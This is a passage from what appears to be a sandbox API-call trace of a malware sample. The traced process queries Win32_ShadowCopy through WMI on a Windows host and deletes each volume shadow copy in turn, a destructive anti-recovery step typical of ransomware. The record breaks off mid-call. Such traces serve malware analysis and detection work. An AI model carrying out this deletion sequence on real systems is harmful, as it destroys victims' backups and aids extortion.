_Context=0x720097006c0005 | out: _String=0x0, _Context=0x720097006c0005) returned="Win32_ShadowCopy" [0109.396] malloc (_Size=0x18) returned 0x28bf10 [0109.396] free (_Block=0x28bfb0) [0109.396] free (_Block=0x28cc90) [0109.396] malloc (_Size=0x18) returned 0x28bfb0 [0109.396] malloc (_Size=0x18) returned 0x28beb0 [0109.396] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0109.396] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0109.397] free (_Block=0x28be90) [0109.397] free (_Block=0x28bfb0) [0109.397] ??0CHString@@QEAA@XZ () returned 0x1cf9f0 [0109.397] GetCurrentThreadId () returned 0xb10 [0109.397] malloc (_Size=0x18) returned 0x28bfb0 [0109.397] malloc (_Size=0x18) returned 0x28be90 [0109.397] malloc (_Size=0x18) returned 0x28bf30 [0109.397] malloc (_Size=0x18) returned 0x28bf50 [0109.397] malloc (_Size=0x18) returned 0x28bf70 [0109.397] SysStringLen (param_1="\\\\") returned 0x2 [0109.397] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0109.397] malloc (_Size=0x18) returned 0x28bf90 [0109.397] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0109.397] SysStringLen (param_1="\\") returned 0x1 [0109.397] malloc (_Size=0x18) returned 0x28ccc0 [0109.397] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0109.398] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0109.398] free (_Block=0x28bf90) [0109.398] free (_Block=0x28bf70) [0109.398] free (_Block=0x28bf50) [0109.398] free (_Block=0x28bf30) [0109.398] free (_Block=0x28be90) [0109.398] free (_Block=0x28bfb0) [0109.398] malloc (_Size=0x18) returned 0x28bfb0 [0109.398] malloc (_Size=0x18) returned 0x28be90 [0109.398] malloc (_Size=0x18) returned 0x28bf30 [0109.398] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1da1390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff1d29d0 | out: ppNamespace=0xff1d29d0*=0x1db3c18) returned 0x0 [0109.404] free (_Block=0x28bf30) [0109.404] free (_Block=0x28be90) [0109.404] free (_Block=0x28bfb0) [0109.404] CoSetProxyBlanket (pProxy=0x1db3c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0109.404] free (_Block=0x28ccc0) [0109.404] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0109.404] ??0CHString@@QEAA@XZ () returned 0x1cf940 [0109.404] GetCurrentThreadId () returned 0xb10 [0109.404] malloc (_Size=0x18) returned 0x28bfb0 [0109.405] lstrlenA (lpString="") returned 0 [0109.405] malloc (_Size=0x2) returned 0x286700 [0109.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff16314c, cbMultiByte=-1, lpWideCharStr=0x286700, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.405] free (_Block=0x286700) [0109.405] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0109.405] SysStringLen (param_1="") returned 0x0 [0109.405] free (_Block=0x28bfb0) [0109.405] malloc (_Size=0x18) returned 0x28bfb0 [0109.405] IWbemServices:ExecQuery (in: This=0x1db3c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x1cf948 | out: ppEnum=0x1cf948*=0x1db3d18) returned 0x0 [0113.114] free (_Block=0x28bfb0) [0113.114] CoSetProxyBlanket (pProxy=0x1db3d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0113.117] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0113.118] malloc (_Size=0x18) returned 0x28bfb0 [0113.118] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.118] free (_Block=0x28bfb0) [0113.119] malloc (_Size=0x800) returned 0x28d490 [0113.119] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0113.119] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="똰4") returned 0x67 [0113.120] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0113.120] malloc (_Size=0x68) returned 0x28dca0 [0113.120] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0113.120] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0113.120] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0113.121] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0113.121] free (_Block=0x28dca0) [0113.121] free (_Block=0x28d490) [0113.121] LocalFree (hMem=0x34b630) returned 0x0 [0113.121] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0118.029] IUnknown:Release (This=0x1db3d80) returned 0x0 [0118.029] malloc (_Size=0x800) returned 0x28d490 [0118.029] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0118.029] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0118.029] malloc (_Size=0x20) returned 0x28dca0 [0118.029] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0118.029] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0118.029] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0118.030] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0118.030] free (_Block=0x28dca0) [0118.030] free (_Block=0x28d490) [0118.030] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0118.031] malloc (_Size=0x18) returned 0x28bfb0 [0118.031] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x34b578, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.031] free (_Block=0x28bfb0) [0118.031] malloc (_Size=0x800) returned 0x28d490 [0118.032] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0118.032] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="똰4") returned 0x67 [0118.032] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0118.032] malloc (_Size=0x68) returned 0x28dca0 [0118.032] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0118.032] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0118.032] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0118.032] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0118.032] free (_Block=0x28dca0) [0118.032] free (_Block=0x28d490) [0118.032] LocalFree (hMem=0x34b630) returned 0x0 [0118.032] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{43A11862-374F-4B42-8013-C8A59B8690F4}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0123.252] IUnknown:Release (This=0x1db3d80) returned 0x0 [0123.252] malloc (_Size=0x800) returned 0x28d490 [0123.252] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0123.252] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0123.252] malloc (_Size=0x20) returned 0x28ee10 [0123.252] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28ee10, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0123.252] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0123.252] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0123.252] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0123.252] free (_Block=0x28ee10) [0123.252] free (_Block=0x28d490) [0123.252] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0123.254] malloc (_Size=0x18) returned 0x28bfb0 [0123.254] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.255] free (_Block=0x28bfb0) [0123.255] malloc (_Size=0x800) returned 0x28d490 [0123.255] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0123.255] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="똰4") returned 0x67 [0123.255] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0123.255] malloc (_Size=0x68) returned 0x28dca0 [0123.255] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0123.255] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0123.255] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0123.255] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0123.255] free (_Block=0x28dca0) [0123.255] free (_Block=0x28d490) [0123.255] LocalFree (hMem=0x34b630) returned 0x0 [0123.255] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0127.719] IUnknown:Release (This=0x1db3d80) returned 0x0 [0127.719] malloc (_Size=0x800) returned 0x28d490 [0127.719] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0127.720] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0127.720] malloc (_Size=0x20) returned 0x28dca0 [0127.720] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0127.720] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0127.720] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0127.720] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0127.720] free (_Block=0x28dca0) [0127.720] free (_Block=0x28d490) [0127.720] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0127.722] malloc (_Size=0x18) returned 0x28bfb0 [0127.723] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0127.723] free (_Block=0x28bfb0) [0127.723] malloc (_Size=0x800) returned 0x28d490 [0127.723] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0127.723] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="똰4") returned 0x67 [0127.723] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0127.723] malloc (_Size=0x68) returned 0x28dca0 [0127.723] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0127.723] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0127.723] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0127.723] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0127.723] free (_Block=0x28dca0) [0127.723] free (_Block=0x28d490) [0127.723] LocalFree (hMem=0x34b630) returned 0x0 [0127.723] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0130.188] IUnknown:Release (This=0x1db3d80) returned 0x0 [0130.188] malloc (_Size=0x800) returned 0x28d490 [0130.188] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0130.188] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0130.188] malloc (_Size=0x20) returned 0x28dca0 [0130.188] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0130.188] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0130.188] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0130.188] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0130.188] free (_Block=0x28dca0) [0130.188] free (_Block=0x28d490) [0130.188] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0130.189] malloc (_Size=0x18) returned 0x28bfb0 [0130.190] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0130.190] free (_Block=0x28bfb0) [0130.190] malloc (_Size=0x800) returned 0x28d490 [0130.190] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d490, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0130.190] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d490, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="똰4") returned 0x67 [0130.190] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0130.190] malloc (_Size=0x68) returned 0x28dca0 [0130.190] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28dca0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0130.190] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0130.190] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0130.190] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0130.190] free (_Block=0x28dca0) [0130.190] free (_Block=0x28d490) [0130.190] LocalFree (hMem=0x34b630) returned 0x0 [0130.190] IWbemServices:DeleteInstance (in: This=0x1db3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0136.172] IUnknown:Release (This=0x1db3d80) returned 0x0 [0136.172] malloc (_Size=0x800) returned 0x28f780 [0136.172] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28f780, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0136.172] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0136.172] malloc (_Size=0x20) returned 0x28ff90 [0136.173] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28ff90, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0136.173] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff1d2ab0 [0136.173] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0136.173] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0136.173] free (_Block=0x28ff90) [0136.173] free (_Block=0x28f780) [0136.173] IEnumWbemClassObject:Next (in: This=0x1db3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf950, puReturned=0x1cf960 | out: apObjects=0x1cf950*=0x1db3d80, puReturned=0x1cf960*=0x1) returned 0x0 [0136.175] malloc (_Size=0x18) returned 0x28bfb0 [0136.175] IWbemClassObject:Get (in: This=0x1db3d80, wszName="__PATH", lFlags=0, pVal=0x1cf970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ee1f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0136.175] free (_Block=0x28bfb0) [0136.175] malloc (_Size=0x800) returned 0x28ee10 [0136.175] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28ee10, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0136.175] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28ee10, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf898, nSize=0x0, Arguments=0x1cf8a8 | out: lpBuffer="똰4") returned 0x67 [0136.175] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0136.175] malloc (_Size=0x68) returned 0x28d9f0 [0136.175] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28d9f0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 